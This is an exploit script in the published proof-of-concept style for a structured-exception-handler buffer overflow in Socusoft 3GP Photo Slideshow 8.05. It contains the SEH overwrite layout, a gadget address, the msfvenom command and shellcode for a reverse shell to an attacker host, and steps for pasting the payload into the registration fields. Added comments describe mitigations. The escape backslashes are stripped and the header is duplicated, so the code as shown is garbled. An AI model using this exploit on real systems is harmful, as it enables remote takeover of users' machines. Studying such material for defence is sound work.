# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the Python exploit script; it creates a new file named "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the fields "Registration Name" + "Registration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell popped up in your attacker box.

# Builds one fixed-length (1500-byte) string and writes it to "exploit.txt".
# Layout, per the variable names and the comments above: 512 bytes of filler,
# an SEH record overwrite (nseh + seh) pointing at a gadget in
# DVDPhotoData.dll, a NOP sled, the msfvenom-generated payload, then padding
# up to the target size.
#
# Defensive notes (from the information on this page):
#   - The gadget comment below records the module as having no ASLR, no
#     rebase and no SafeSEH. Linking that module with /SAFESEH and
#     /DYNAMICBASE, and running the process under DEP, is what breaks this
#     class of SEH-overwrite technique.
#   - The trigger is oversized text pasted into the registration dialog;
#     length-checking that input in the application removes the overflow
#     itself.
#   - The script is written for Python 2 (print statements, str payload).
buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:Program FilesSocusoftSocusoft 3GP Photo SlideshowDVDPhotoData.dll)
# nseh: short jump forward over the SEH slot; seh: the gadget address above.
nseh = "xebx06x90x90"
seh = "x2dx0bx03x10"
# Sled in front of the payload (18 bytes).
nops = "x90" * 18
#Badchar x00x0ax0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b 'x00x0ax0d' -f python

# Payload emitted by the msfvenom command above (reverse shell to the
# LHOST/LPORT given there); reproduced verbatim, not regenerated.
buf = ""
buf += "xb8x4cxabxe1x3cxd9xd0xd9x74x24xf4x5bx33"
buf += "xc9xb1x52x31x43x12x83xebxfcx03x0fxa5x03"
buf += "xc9x73x51x41x32x8bxa2x26xbax6ex93x66xd8"
buf += "xfbx84x56xaaxa9x28x1cxfex59xbax50xd7x6e"
buf += "x0bxdex01x41x8cx73x71xc0x0ex8exa6x22x2e"
buf += "x41xbbx23x77xbcx36x71x20xcaxe5x65x45x86"
buf += "x35x0ex15x06x3exf3xeex29x6fxa2x65x70xaf"
buf += "x45xa9x08xe6x5dxaex35xb0xd6x04xc1x43x3e"
buf += "x55x2axefx7fx59xd9xf1xb8x5ex02x84xb0x9c"
buf += "xbfx9fx07xdex1bx15x93x78xefx8dx7fx78x3c"
buf += "x4bxf4x76x89x1fx52x9bx0cxf3xe9xa7x85xf2"
buf += "x3dx2exddxd0x99x6ax85x79xb8xd6x68x85xda"
buf += "xb8xd5x23x91x55x01x5exf8x31xe6x53x02xc2"
buf += "x60xe3x71xf0x2fx5fx1dxb8xb8x79xdaxbfx92"
buf += "x3ex74x3ex1dx3fx5dx85x49x6fxf5x2cxf2xe4"
buf += "x05xd0x27xaax55x7ex98x0bx05x3ex48xe4x4f"
buf += "xb1xb7x14x70x1bxd0xbfx8bxccxd5x3fx91x09"
buf += "x82x3dx95x14x6bxcbx73x7cx9bx9dx2cxe9x02"
buf += "x84xa6x88xcbx12xc3x8bx40x91x34x45xa1xdc"
buf += "x26x32x41xabx14x95x5ex01x30x79xccxcexc0"
buf += "xf4xedx58x97x51xc3x90x7dx4cx7ax0bx63x8d"
buf += "x1ax74x27x4axdfx7bxa6x1fx5bx58xb8xd9x64"
buf += "xe4xecxb5x32xb2x5ax70xedx74x34x2ax42xdf"
buf += "xd0xabxa8xe0xa6xb3xe4x96x46x05x51xefx79"
buf += "xaax35xe7x02xd6xa5x08xd9x52xd5x42x43xf2"
buf += "x7ex0bx16x46xe3xacxcdx85x1ax2fxe7x75xd9"
buf += "x2fx82x70xa5xf7x7fx09xb6x9dx7fxbexb7xb7"

# Pad so the concatenation below is exactly 1500 bytes long (assuming the
# preceding parts total less than 1500; otherwise the multiplier is
# negative and pad is empty).
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
# Write the string to exploit.txt in the current directory.
# NOTE(review): the bare `except:` below catches every exception (including
# KeyboardInterrupt) and discards the real error, so e.g. a permission
# problem is reported only as "File cannot be created". If f.write raises,
# f.close() is skipped and the handle is left to the garbage collector.
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"